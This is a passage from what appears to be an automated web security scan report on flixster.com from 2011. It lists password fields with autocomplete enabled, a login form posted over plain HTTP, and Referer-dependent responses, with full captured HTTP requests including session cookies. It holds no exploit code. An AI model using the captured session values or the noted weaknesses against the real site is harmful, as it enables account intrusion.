<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmln
...[SNIP]...
<div class="boxContent clearfix">
<form name="loginForm" action="/userAuth.do" method="post">
<input type="hidden" name="userauthAction" value="doLogin" />
...[SNIP]...
<td colspan="2"><input type="password" class="text" id="userauthPassword" name="userauthPassword" value="" maxlength="100" tabindex="2" /></td>
...[SNIP]...

4.2. http://www.flixster.com/people/meet  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.flixster.com
Path:   /people/meet

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /people/meet HTTP/1.1
Host: www.flixster.com
Proxy-Connection: keep-alive
Referer: http://www.flixster.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1212; JSESSIONID=8F25DA58E826E87274AB123E98E4E0EC.localhost; __qca=P0-1612527485-1313664016809; __utmz=1.1313664010.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.456048224.1313664010.1313664010.1313664010.1; __utmc=1; __utmv=1.Default; __utmb=1.1.10.1313664010; qcs=qcs%3DD%3Bqcs%3DT%3Bqcs%3D6384%3Bqcs%3D5913%3Bqcs%3D5076%3Bqcs%3D4058%3Bqcs%3D3940%3Bqcs%3D2738%3Bqcs%3D2735%3Bqcs%3D2731%3Bqcs%3D2728%3Bqcs%3D2726%3Bqcs%3D2725%3Bqcs%3D2722%3Bqcs%3D2720

Response

HTTP/1.0 200 OK
Date: Thu, 18 Aug 2011 10:41:21 GMT
Server: Apache
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns
...[SNIP]...
<!-- disable ssl-based login for now. something is fishy based on exit rates for the login page. miguel 8/7/2009 -->                
<form name="login" action="/userAuth.do" method="post" style="width:59%; margin:0 auto;float:left;text-align:left;">
<input type="hidden" name="userauthAction" value="doLogin" />
...[SNIP]...
<td align="left"><input type="password" name="userauthPassword" maxlength="50" tabindex="2" /></td>
...[SNIP]...

4.3. http://www.flixster.com/userAuth.do  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.flixster.com
Path:   /userAuth.do

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

POST /userAuth.do HTTP/1.1
Host: www.flixster.com
Proxy-Connection: keep-alive
Referer: http://www.flixster.com/people/meet
Content-Length: 138
Cache-Control: max-age=0
Origin: http://www.flixster.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1212; JSESSIONID=8F25DA58E826E87274AB123E98E4E0EC.localhost; __qca=P0-1612527485-1313664016809; __utmz=1.1313664010.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.456048224.1313664010.1313664010.1313664010.1; __utmc=1; __utmv=1.Default; __utmb=1.2.10.1313664010; qcs=qcs%3DD%3Bqcs%3DT%3Bqcs%3D6384%3Bqcs%3D5913%3Bqcs%3D5076%3Bqcs%3D4058%3Bqcs%3D3940%3Bqcs%3D2738%3Bqcs%3D2735%3Bqcs%3D2731%3Bqcs%3D2728%3Bqcs%3D2726%3Bqcs%3D2725%3Bqcs%3D2722%3Bqcs%3D2720

userauthAction=doLogin&redirectTarget=%2Fpeople%2Fmeet&userauthEmail=ss&userauthPassword=&userauthRemember=on&submit=Login+to+Flixster+%3E

Response

HTTP/1.0 200 OK
Date: Thu, 18 Aug 2011 10:41:31 GMT
Server: Apache
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: http://www.flixster.com
Access-Control-Allow-Credentials: true
Content-Language: en
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns
...[SNIP]...
<!-- disable ssl-based login for now. something is fishy based on exit rates for the login page. miguel 8/7/2009 -->                
<form name="login" action="/userAuth.do" method="post" style="width:59%; margin:0 auto;float:left;text-align:left;">
<input type="hidden" name="userauthAction" value="doLogin" />
...[SNIP]...
<td align="left"><input type="password" name="userauthPassword" maxlength="50" tabindex="2" /></td>
...[SNIP]...

5. Referer-dependent response  previous  next
There are 3 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.



5.1. http://www.flixster.com/people/meet  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.flixster.com
Path:   /people/meet

Request 1

GET /people/meet HTTP/1.1
Host: www.flixster.com
Proxy-Connection: keep-alive
Referer: http://www.flixster.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1212; JSESSIONID=8F25DA58E826E87274AB123E98E4E0EC.localhost; __qca=P0-1612527485-1313664016809; __utmz=1.1313664010.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.456048224.1313664010.1313664010.1313664010.1; __utmc=1; __utmv=1.Default; __utmb=1.1.10.1313664010; qcs=qcs%3DD%3Bqcs%3DT%3Bqcs%3D6384%3Bqcs%3D5913%3Bqcs%3D5076%3Bqcs%3D4058%3Bqcs%3D3940%3Bqcs%3D2738%3Bqcs%3D2735%3Bqcs%3D2731%3Bqcs%3D2728%3Bqcs%3D2726%3Bqcs%3D2725%3Bqcs%3D2722%3Bqcs%3D2720

Response 1

HTTP/1.0 200 OK
Date: Thu, 18 Aug 2011 10:41:21 GMT
Server: Apache
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns
...[SNIP]...
src="http://ad.doubleclick.net/N6327/ad/flix.misc/misc;pos=top;tile=1;sz=300x250,300x600;url=;horror=0;comedy=0;scifi=0;action=0;animation=0;drama=0;kids=0;mystery=0;romance=0;influencer=0;;test=0;ord=52639000?" border="0" alt=""></a></noscript>
<!-- End DART Tag-->
   
   
   
</div>
       </div>
</div>

<script type="text/javascript" language="javascript">
document.login.userauthEmail.focus();
</script>

</div>













   
   
   
   
       <div id="pageFooter">
       
       
       
           
   
       <p>
           <strong>Explore</strong> |
           <a href="/sitemap/movies">Movies</a> |
           <a href="/sitemap/actors">Actors &amp; Actresses</a> |
           <a href="/sitemap/photos">Photos</a> |
           <a href="/sitemap/theaters">Theaters</a> |
           <a href="/sitemap/news">News</a> |
           <a href="/sitemap/movie-lists">Lists</a> |
           <a href="/sitemap/quizzes">Quizzes</a> |
           <a href="/best">Best Movies</a> |
           <a href="/blog">Blog</a> |
           <a href="/sitemap/reviews">Reviews</a> |
           <a href="/wap/apps">Mobile</a>
       </p>
       
       <p>
           <strong>More Info</strong> |
           <a rel="nofollow" title="Flixster Copyrights, Privacy Policy, Terms of Service" href="/misc/copyrightprivacyterms">Copyright, Privacy Policy, Terms of Service</a> |
           <a rel="nofollow" title="About Flixster" href="/about">About Us</a> |
           <a rel="nofollow" title="Jobs at Flixster" href="/misc/jobs">Jobs</a> |
           <a rel="nofollow" title="Advertise on Flixster" href="/about/advertise">Advertise</a> |
    <a href="http://www.twitter.com/flixster">Follow Flixster on Twitter!</a> |
           <a rel="nofollow" title="Flixster SuperReviewers" href="/support/topic/superreviewers">Flixster SuperReviewers</a>
           
   
       </p>
       
       <p>
           <strong>Help</strong> |
           <a title="Sitemap" href="/sitemap">Sitemap</a> |
           <a rel="nofollow" title="Help" href="http://flixster.assistly.com/customer/portal/topics/29973-flixster-com/articles" target="_blank">Help</a>
       </p>
       
       <p class="pageCopyright">Copyright &copy; 2010 Flixster, All Rights Reserved <a href="/misc/trademark">Trademark Use Guidelines</a></p>
       
       <p><a title="Get Skyfire - Browse the PC web on your phone" href="http://get.skyfire.com/">Get Skyfi
...[SNIP]...

Request 2

GET /people/meet HTTP/1.1
Host: www.flixster.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1212; JSESSIONID=8F25DA58E826E87274AB123E98E4E0EC.localhost; __qca=P0-1612527485-1313664016809; __utmz=1.1313664010.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.456048224.1313664010.1313664010.1313664010.1; __utmc=1; __utmv=1.Default; __utmb=1.1.10.1313664010; qcs=qcs%3DD%3Bqcs%3DT%3Bqcs%3D6384%3Bqcs%3D5913%3Bqcs%3D5076%3Bqcs%3D4058%3Bqcs%3D3940%3Bqcs%3D2738%3Bqcs%3D2735%3Bqcs%3D2731%3Bqcs%3D2728%3Bqcs%3D2726%3Bqcs%3D2725%3Bqcs%3D2722%3Bqcs%3D2720

Response 2

HTTP/1.0 200 OK
Date: Thu, 18 Aug 2011 10:41:22 GMT
Server: Apache
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns
...[SNIP]...
src="http://ad.doubleclick.net/N6327/ad/flix.misc/misc;pos=top;tile=1;sz=300x250,300x600;url=;horror=0;comedy=0;scifi=0;action=0;animation=0;drama=0;kids=0;mystery=0;romance=0;influencer=0;;test=0;ord=60289000?" border="0" alt=""></a></noscript>
<!-- End DART Tag-->
   
   
   
</div>
       </div>
</div>

<script type="text/javascript" language="javascript">
document.login.userauthEmail.focus();
</script>

</div>













   
   
   
   
       <div id="pageFooter">
       
       
       
           
   
       <p>
           <strong>Explore</strong> |
           <a href="/sitemap/movies">Movies</a> |
           <a href="/sitemap/actors">Actors &amp; Actresses</a> |
           <a href="/sitemap/photos">Photos</a> |
           <a href="/sitemap/theaters">Theaters</a> |
           <a href="/sitemap/news">News</a> |
           <a href="/sitemap/movie-lists">Lists</a> |
           <a href="/sitemap/quizzes">Quizzes</a> |
           <a href="/best">Best Movies</a> |
           <a href="/blog">Blog</a> |
           <a href="/sitemap/reviews">Reviews</a> |
           <a href="/wap/apps">Mobile</a>
       </p>
       
       <p>
           <strong>More Info</strong> |
           <a rel="nofollow" title="Flixster Copyrights, Privacy Policy, Terms of Service" href="/misc/copyrightprivacyterms">Copyright, Privacy Policy, Terms of Service</a> |
           <a rel="nofollow" title="About Flixster" href="/about">About Us</a> |
           <a rel="nofollow" title="Jobs at Flixster" href="/misc/jobs">Jobs</a> |
           <a rel="nofollow" title="Advertise on Flixster" href="/about/advertise">Advertise</a> |
    <a href="http://www.twitter.com/flixster">Follow Flixster on Twitter!</a> |
           <a rel="nofollow" title="Flixster SuperReviewers" href="/support/topic/superreviewers">Flixster SuperReviewers</a>
           
   
       </p>
       
       <p>
           <strong>Help</strong> |
           <a title="Sitemap" href="/sitemap">Sitemap</a> |
           <a rel="nofollow" title="Help" href="http://flixster.assistly.com/customer/portal/topics/29973-flixster-com/articles" target="_blank">Help</a>
       </p>
       
       <p class="pageCopyright">Copyright &copy; 2010 Flixster, All Rights Reserved <a href="/misc/trademark">Trademark Use Guidelines</a></p>
       
       <p><a title="Get Skyfire - Browse the PC web on your phone" href="http://get.skyfire.com/">Get Skyfi
...[SNIP]...

5.2. http://www.flixster.com/sitemap/photos  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.flixster.com
Path:   /sitemap/photos

Request 1

GET /sitemap/photos HTTP/1.1
Host: www.flixster.com
Proxy-Connection: keep-alive
Referer: http://www.flixster.com/userAuth.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1212; JSESSIONID=8F25DA58E826E87274AB123E98E4E0EC.localhost; __qca=P0-1612527485-1313664016809; __utmz=1.1313664010.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.456048224.1313664010.1313664010.1313664010.1; __utmc=1; __utmv=1.Default; qcs=qcs%3DD%3Bqcs%3DT%3Bqcs%3D6384%3Bqcs%3D5913%3Bqcs%3D5076%3Bqcs%3D4058%3Bqcs%3D3940%3Bqcs%3D2738%3Bqcs%3D2735%3Bqcs%3D2731%3Bqcs%3D2728%3Bqcs%3D2726%3Bqcs%3D2725%3Bqcs%3D2722%3Bqcs%3D2720

Response 1

HTTP/1.0 200 OK
Date: Thu, 18 Aug 2011 11:34:24 GMT
Server: Apache
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns
...[SNIP]...
;" src="http://b.scorecardresearch.com/b?c1=2&c2=3002201&c3=3002201&c4=http%3A%2F%2Fwww.flixster.com%2Fsitemap%2Fphotos&c5=&c6=&c7=http%3A%2F%2Fwww.flixster.com%2Fsitemap%2Fphotos&c8=Sitemap+Photos&c9=http%3A%2F%2Fwww.flixster.com%2FuserAuth.do&c10=&c15=&rn=1313667264841" alt="" />
   <img style="visibility:hidden;width:0px;height:0px;" src="http://b.scorecardresearch.com/b?c1=7&c2=3002201&c3=3002201&c4=http%3A%2F%2Fwww.flixster.com%2Fsitemap%2Fphotos&c5=&c6=&c7=http%3A%2F%2Fwww.flixster.com%2Fsitemap%2Fphotos&c8=Sitemap+Photos&c9=http%3A%2F%2Fwww.flixster.com%2FuserAuth.do&c10=&c15=&rn=1313667264841" alt="" />
   
   
   <img height=1 width=1 src="http://tags.bluekai.com/site/991">
   
   
   <!-- START Nielsen Online SiteCensus V6.0 -->
   <!-- COPYRIGHT 2010 Nielsen Online -->
   <script type="text/javascript" src="//secure-us.imrworldwide.com/v60.js"></script>
   <script type="text/javascript">
    var pvar = { cid: "us-203323h", content: "0", server: "secure-us" };
    var trac = nol_t(pvar);
    trac.record().post();
   </script>
   <noscript><div> <img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-203323h&amp;cg=0&amp;cc=1&amp;ts=noscript" width="1" height="1" alt="" /> </div></noscript>
   <!-- END Nielsen Online SiteCensus V6.0 -->
   
   
   <script type="text/javascript">_qoptions={ qacct:"p-0fuRlG_jy3lfA" };</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
   <noscript><a href="http://www.quantcast.com/p-0fuRlG_jy3lfA" target="_blank"><img src="http://pixel.quantserve.com/pixel/p-0fuRlG_jy3lfA.gif" style="display: none" border="0" height="1" width="1" alt="Quantcast"/></a></noscript>
   
   
   
   <script type="text/javascript">
   function qc_results(result) {
       quantSegs="";
       for (var i = 0; i < result.segments.length; i++) {
           quantSegs += 'qcs=' + result.segments[i].id;
           if (i<result.segments.length-1) { quantSegs += ';'; }
       }
       CookieUtils.set("qcs", quantSegs, 60, true);
   }
   </script>
   <script type="text/javascript" src="http://pixel.quantserve.com/api/segments.json?a=p-0fuRlG_jy3lfA&callback=qc_results" ></script>
   
   
   
   
   
   





<script type="text/javascript">
if($('socialmedia-OldSpiceExpInit') != null){
$('socialmedia-Old
...[SNIP]...

Request 2

GET /sitemap/photos HTTP/1.1
Host: www.flixster.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1212; JSESSIONID=8F25DA58E826E87274AB123E98E4E0EC.localhost; __qca=P0-1612527485-1313664016809; __utmz=1.1313664010.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.456048224.1313664010.1313664010.1313664010.1; __utmc=1; __utmv=1.Default; qcs=qcs%3DD%3Bqcs%3DT%3Bqcs%3D6384%3Bqcs%3D5913%3Bqcs%3D5076%3Bqcs%3D4058%3Bqcs%3D3940%3Bqcs%3D2738%3Bqcs%3D2735%3Bqcs%3D2731%3Bqcs%3D2728%3Bqcs%3D2726%3Bqcs%3D2725%3Bqcs%3D2722%3Bqcs%3D2720

Response 2

HTTP/1.0 200 OK
Date: Thu, 18 Aug 2011 11:34:25 GMT
Server: Apache
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns
...[SNIP]...
;" src="http://b.scorecardresearch.com/b?c1=2&c2=3002201&c3=3002201&c4=http%3A%2F%2Fwww.flixster.com%2Fsitemap%2Fphotos&c5=&c6=&c7=http%3A%2F%2Fwww.flixster.com%2Fsitemap%2Fphotos&c8=Sitemap+Photos&c9=&c10=&c15=&rn=1313667265447" alt="" />
   <img style="visibility:hidden;width:0px;height:0px;" src="http://b.scorecardresearch.com/b?c1=7&c2=3002201&c3=3002201&c4=http%3A%2F%2Fwww.flixster.com%2Fsitemap%2Fphotos&c5=&c6=&c7=http%3A%2F%2Fwww.flixster.com%2Fsitemap%2Fphotos&c8=Sitemap+Photos&c9=&c10=&c15=&rn=1313667265447" alt="" />
   
   
   <img height=1 width=1 src="http://tags.bluekai.com/site/991">
   
   
   <!-- START Nielsen Online SiteCensus V6.0 -->
   <!-- COPYRIGHT 2010 Nielsen Online -->
   <script type="text/javascript" src="//secure-us.imrworldwide.com/v60.js"></script>
   <script type="text/javascript">
    var pvar = { cid: "us-203323h", content: "0", server: "secure-us" };
    var trac = nol_t(pvar);
    trac.record().post();
   </script>
   <noscript><div> <img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-203323h&amp;cg=0&amp;cc=1&amp;ts=noscript" width="1" height="1" alt="" /> </div></noscript>
   <!-- END Nielsen Online SiteCensus V6.0 -->
   
   
   <script type="text/javascript">_qoptions={ qacct:"p-0fuRlG_jy3lfA" };</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
   <noscript><a href="http://www.quantcast.com/p-0fuRlG_jy3lfA" target="_blank"><img src="http://pixel.quantserve.com/pixel/p-0fuRlG_jy3lfA.gif" style="display: none" border="0" height="1" width="1" alt="Quantcast"/></a></noscript>
   
   
   
   <script type="text/javascript">
   function qc_results(result) {
       quantSegs="";
       for (var i = 0; i < result.segments.length; i++) {
           quantSegs += 'qcs=' + result.segments[i].id;
           if (i<result.segments.length-1) { quantSegs += ';'; }
       }
       CookieUtils.set("qcs", quantSegs, 60, true);
   }
   </script>
   <script type="text/javascript" src="http://pixel.quantserve.com/api/segments.json?a=p-0fuRlG_jy3lfA&callback=qc_results" ></script>
   
   
   
   
   
   





<script type="text/javascript">
if($('socialmedia-OldSpiceExpInit') != null){
$('socialmedia-OldSpiceExpInit').setStyle({zIndex : '3'});
}
if($('socialmedia-OldSpiceExpSec'))
...[SNIP]...

5.3. http://www.flixster.com/userAuth.do  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.flixster.com
Path:   /userAuth.do

Request 1

POST /userAuth.do HTTP/1.1
Host: www.flixster.com
Proxy-Connection: keep-alive
Referer: http://www.flixster.com/people/meet
Content-Length: 138
Cache-Control: max-age=0
Origin: http://www.flixster.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1212; JSESSIONID=8F25DA58E826E87274AB123E98E4E0EC.localhost; __qca=P0-1612527485-1313664016809; __utmz=1.1313664010.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.456048224.1313664010.1313664010.1313664010.1; __utmc=1; __utmv=1.Default; __utmb=1.2.10.1313664010; qcs=qcs%3DD%3Bqcs%3DT%3Bqcs%3D6384%3Bqcs%3D5913%3Bqcs%3D5076%3Bqcs%3D4058%3Bqcs%3D3940%3Bqcs%3D2738%3Bqcs%3D2735%3Bqcs%3D2731%3Bqcs%3D2728%3Bqcs%3D2726%3Bqcs%3D2725%3Bqcs%3D2722%3Bqcs%3D2720

userauthAction=doLogin&redirectTarget=%2Fpeople%2Fmeet&userauthEmail=ss&userauthPassword=&userauthRemember=on&submit=Login+to+Flixster+%3E

Response 1

HTTP/1.0 200 OK
Date: Thu, 18 Aug 2011 10:41:31 GMT
Server: Apache
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: http://www.flixster.com
Access-Control-Allow-Credentials: true
Content-Language: en
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns
...[SNIP]...
rc="http://ad.doubleclick.net/N6327/ad/flix.misc/misc;pos=top;tile=1;sz=300x250,300x600;url=;horror=0;comedy=0;scifi=0;action=0;animation=0;drama=0;kids=0;mystery=0;romance=0;influencer=0;;test=0;ord=27654000?" border="0" alt=""></a></noscript>
<!-- End DART Tag-->
   
   
   
</div>
       </div>
</div>

<script type="text/javascript" language="javascript">
document.login.userauthEmail.focus();
</script>

</div>













   
   
   
   
       <div id="pageFooter">
       
       
       
           
   
       <p>
           <strong>Explore</strong> |
           <a href="/sitemap/movies">Movies</a> |
           <a href="/sitemap/actors">Actors &amp; Actresses</a> |
           <a href="/sitemap/photos">Photos</a> |
           <a href="/sitemap/theaters">Theaters</a> |
           <a href="/sitemap/news">News</a> |
           <a href="/sitemap/movie-lists">Lists</a> |
           <a href="/sitemap/quizzes">Quizzes</a> |
           <a href="/best">Best Movies</a> |
           <a href="/blog">Blog</a> |
           <a href="/sitemap/reviews">Reviews</a> |
           <a href="/wap/apps">Mobile</a>
       </p>
       
       <p>
           <strong>More Info</strong> |
           <a rel="nofollow" title="Flixster Copyrights, Privacy Policy, Terms of Service" href="/misc/copyrightprivacyterms">Copyright, Privacy Policy, Terms of Service</a> |
           <a rel="nofollow" title="About Flixster" href="/about">About Us</a> |
           <a rel="nofollow" title="Jobs at Flixster" href="/misc/jobs">Jobs</a> |
           <a rel="nofollow" title="Advertise on Flixster" href="/about/advertise">Advertise</a> |
    <a href="http://www.twitter.com/flixster">Follow Flixster on Twitter!</a> |
           <a rel="nofollow" title="Flixster SuperReviewers" href="/support/topic/superreviewers">Flixster SuperReviewers</a>
           
   
       </p>
       
       <p>
           <strong>Help</strong> |
           <a title="Sitemap" href="/sitemap">Sitemap</a> |
           <a rel="nofollow" title="Help" href="http://flixster.assistly.com/customer/portal/topics/29973-flixster-com/articles" target="_blank">Help</a>
       </p>
       
       <p class="pageCopyright">Copyright &copy; 2010 Flixster, All Rights Reserved <a href="/misc/trademark">Trademark Use Guidelines</a></p>
       
       <p><a title="Get Skyfire - Browse the PC web on your phone" href="http://get.skyfire.com/">Get Skyfir
...[SNIP]...

Request 2

POST /userAuth.do HTTP/1.1
Host: www.flixster.com
Proxy-Connection: keep-alive
Content-Length: 138
Cache-Control: max-age=0
Origin: http://www.flixster.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1212; JSESSIONID=8F25DA58E826E87274AB123E98E4E0EC.localhost; __qca=P0-1612527485-1313664016809; __utmz=1.1313664010.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.456048224.1313664010.1313664010.1313664010.1; __utmc=1; __utmv=1.Default; __utmb=1.2.10.1313664010; qcs=qcs%3DD%3Bqcs%3DT%3Bqcs%3D6384%3Bqcs%3D5913%3Bqcs%3D5076%3Bqcs%3D4058%3Bqcs%3D3940%3Bqcs%3D2738%3Bqcs%3D2735%3Bqcs%3D2731%3Bqcs%3D2728%3Bqcs%3D2726%3Bqcs%3D2725%3Bqcs%3D2722%3Bqcs%3D2720

userauthAction=doLogin&redirectTarget=%2Fpeople%2Fmeet&userauthEmail=ss&userauthPassword=&userauthRemember=on&submit=Login+to+Flixster+%3E

Response 2

HTTP/1.0 200 OK
Date: Thu, 18 Aug 2011 10:41:32 GMT
Server: Apache
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: http://www.flixster.com
Access-Control-Allow-Credentials: true
Content-Language: en
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns
...[SNIP]...
rc="http://ad.doubleclick.net/N6327/ad/flix.misc/misc;pos=top;tile=1;sz=300x250,300x600;url=;horror=0;comedy=0;scifi=0;action=0;animation=0;drama=0;kids=0;mystery=0;romance=0;influencer=0;;test=0;ord=29171000?" border="0" alt=""></a></noscript>
<!-- End DART Tag-->
   
   
   
</div>
       </div>
</div>

<script type="text/javascript" language="javascript">
document.login.userauthEmail.focus();
</script>

</div>













   
   
   
   
       <div id="pageFooter">
       
       
       
           
   
       <p>
           <strong>Explore</strong> |
